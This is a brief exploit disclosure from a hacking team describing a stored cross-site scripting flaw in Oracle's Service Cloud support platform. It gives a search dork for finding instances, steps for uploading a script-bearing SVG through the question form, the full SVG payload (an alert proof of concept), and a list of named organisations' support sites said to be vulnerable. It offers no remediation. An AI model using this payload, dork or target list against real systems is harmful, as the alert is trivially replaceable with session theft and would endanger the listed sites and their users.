# [+] Title : Oracle Integrated Support Platform Service XSS Vulnerability # [+] Author (Discovered by) : Zunfix # [+] Team: TurkHackTeam # [+] Vendor: cloud.oracle.com/service-cloud # [+] Date : Jul, 10th 2019 # [+] Dork : inurl:/app/answers/list # [+] Poc : + We have to dork in search engine + We create an account on the vulnerable site [Register path: /app/utils/create_account] + We go to the Ask a question page and add and send the svg file containing the exploit code [Question page: /app/ask] + We go to the support history page and go to the question we asked from the list [History page: /app/account/questions/list] + We open the exploit svg file that we added from our question page + Exploit code running [Exploit code: <script>alert(123)</script>] # [+] Svg file source code containing exploit : <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script> alert(123) </script> </svg> # [+] Vulnerable Sites E.g : + answers.nssc.nasa.gov + help.cbp.gov + supportcenter.ieee.org + support.us.playstation.com + support.en.kodak.com + eng.faq.panasonic.com + kb.sandisk.com